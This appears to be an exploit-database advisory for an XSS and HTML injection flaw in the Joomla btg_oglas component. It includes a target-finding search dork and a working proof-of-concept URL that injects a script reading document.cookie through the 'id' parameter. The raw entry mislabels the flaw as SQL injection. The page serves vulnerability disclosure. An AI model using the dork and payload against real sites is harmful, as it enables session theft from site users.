Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability

vendor:

btg_oglas

by:

CoBRa_21

7,5

CVSS

HIGH

HTML & XSS Injection

CWE

Product Name: btg_oglas

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability

An attacker can inject malicious HTML and XSS code into the vulnerable parameter 'id' of the btg_oglas component in Joomla. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized and filtered before being used in the application.

Source

Exploit-DB raw data:

################################################################################################################
Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability 
################################################################################################################
Author : CoBRa_21
Dork : inurl:btg_oglas
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=btg_oglas&id=<script>alert(document.cookie)</script>
################################################################################################################
Thanks Cyber-Warrior.org  &  AKINCILAR 
################################################################################################################